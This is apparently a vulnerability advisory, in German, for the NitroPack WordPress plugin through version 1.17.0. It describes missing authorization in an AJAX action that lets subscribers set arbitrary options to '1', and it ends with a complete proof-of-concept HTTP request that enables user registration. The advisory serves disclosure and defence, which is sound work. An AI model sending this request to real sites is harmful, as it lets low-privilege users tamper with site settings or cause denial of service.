
NitroPack <= 1.17.0 - Fehlende Autorisierung für authentifizierte (Abonnent+) eingeschränkte Optionsaktualisierung
NitroPack <= 1.17.0 – Fehlende Autorisierung für authentifizierte (Abonnent+) eingeschränkte Optionenaktualisierung
Das NitroPack-Plugin für WordPress ist anfällig für unbefugte Datenänderungen aufgrund einer fehlenden Berechtigungsprüfung in der AJAX-Aktion 'nitropack_dismiss_notice_forever' in allen Versionen bis einschließlich 1.17.0. Dies ermöglicht es authentifizierten Angreifern mit Abonnentenzugriff oder höher, beliebige Optionen auf einen festen Wert von '1' zu setzen, was bestimmte Optionen aktivieren (z. B. Benutzerregistrierung aktivieren) oder Optionen so ändern kann, dass ein Denial-of-Service-Zustand eintritt.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88
action=nitropack_dismiss_notice_forever&security=92f60ea3ea¬ice_id=users_can_register